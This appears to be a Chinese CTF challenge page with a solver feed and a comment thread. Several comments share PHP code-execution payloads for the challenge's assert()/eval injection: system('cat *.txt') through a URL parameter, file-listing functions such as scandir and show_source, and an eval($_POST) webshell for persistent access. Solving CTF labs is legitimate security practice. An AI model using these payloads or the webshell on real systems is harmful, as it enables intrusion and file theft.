评分(8)
解题动态

testda 攻破了该题 1小时前

Cyyyyg 攻破了该题 3小时前

goeasy 攻破了该题 5小时前

867736371 攻破了该题 6小时前

废柴小白 攻破了该题 6小时前

19893123836 攻破了该题 6小时前

baza 攻破了该题 17小时前

qwerfsafafa 攻破了该题 23小时前

Hehe0619 攻破了该题 1天前

ahco 攻破了该题 1天前

17335918325 攻破了该题 1天前

17365797718 攻破了该题 2天前

afanda 攻破了该题 2天前

zhouzehui57 攻破了该题 2天前

小白ctf 攻破了该题 3天前

rufeii 攻破了该题 3天前

qwerasdz 攻破了该题 3天前

awuawu 攻破了该题 3天前

dwx1583 攻破了该题 4天前

评论
eleven 3年前
举报
?s=system("cat *.txt")
naihe567 3年前
举报
没法用POST的webshell,可以自己创建一个命令执行eval($_POST[‘xxx’]) 密码xxx
mantou 3年前
举报
http://114.67.246.176:18711/?s=system(%22cat%20xxxxxxxx.txt%22)
Y1rannn 4年前
举报
...没那么复杂啊,我直接s=system("")
pest 4年前
举报
除了菜刀,还可以利用print_r(glob("*.*")) scandir() //作用能扫描文件夹下的目录和文件,返回值为所有文件名组成的一个数组 show_source() //显示文件源码 highlight_file() //和show_source()函数是一个意思 我直接复制的一个大佬的wp过来的。
simpleboy 4年前
举报
解法还是很多的
simpleboy 4年前
举报
命令执行了
三分踯躅 4年前
举报
哇,真的有那么复杂吗,蚁剑都整上了,难道是我用assert命令执行的姿势太low了吗
GGBond9527 4年前
举报
assert()代码执行漏洞
xiaotan451 4年前
举报
我是肖彪
xiaotan451 4年前
举报
@biaoxiao 我是流汗了
biaoxiao 4年前
举报
嗯 你说得对